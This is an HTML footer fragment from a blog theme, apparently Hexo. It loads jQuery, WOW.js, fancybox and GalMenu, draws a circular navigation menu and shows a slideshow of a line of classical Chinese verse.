<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  
<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">

  
<script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>




  
<link rel="stylesheet" href="/plugin/galmenu/GalMenu.css">

  
<script src="/plugin/galmenu/GalMenu.js"></script>

  <div class="GalMenu GalDropDown">
      <div class="circle" id="gal">
        <div class="ring">
          
            <a href="/" title="" class="menuItem">首页</a>
          
            <a href="/tags" title="" class="menuItem">标签</a>
          
            <a href="/categories" title="" class="menuItem">分类</a>
          
            <a href="/archives" title="" class="menuItem">归档</a>
          
            <a href="/xxxxxxxxx" title="" class="menuItem">xxx</a>
          
            <a href="/xxxxxxx" title="" class="menuItem">xxxx</a>
          
        </div>
        
          <audio id="audio" src="#"></audio>
        
      </div> 
</div>
<div id="overlay" style="opacity: 1; cursor: pointer;"></div>
  <script type="text/javascript">var items = document.querySelectorAll('.menuItem');
    for (var i = 0,
    l = items.length; i < l; i++) {
      items[i].style.left = (50 - 35 * Math.cos( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%";
      items[i].style.top = (50 + 35 * Math.sin( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%"
    }</script>
<script type="text/javascript">
  $(document).ready(function() {
    $('body').GalMenu({
      'menu': 'GalDropDown'
    })
  });
</script>

  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>

<script src="/js/script.js"></script>




  </div>
</body>
</html>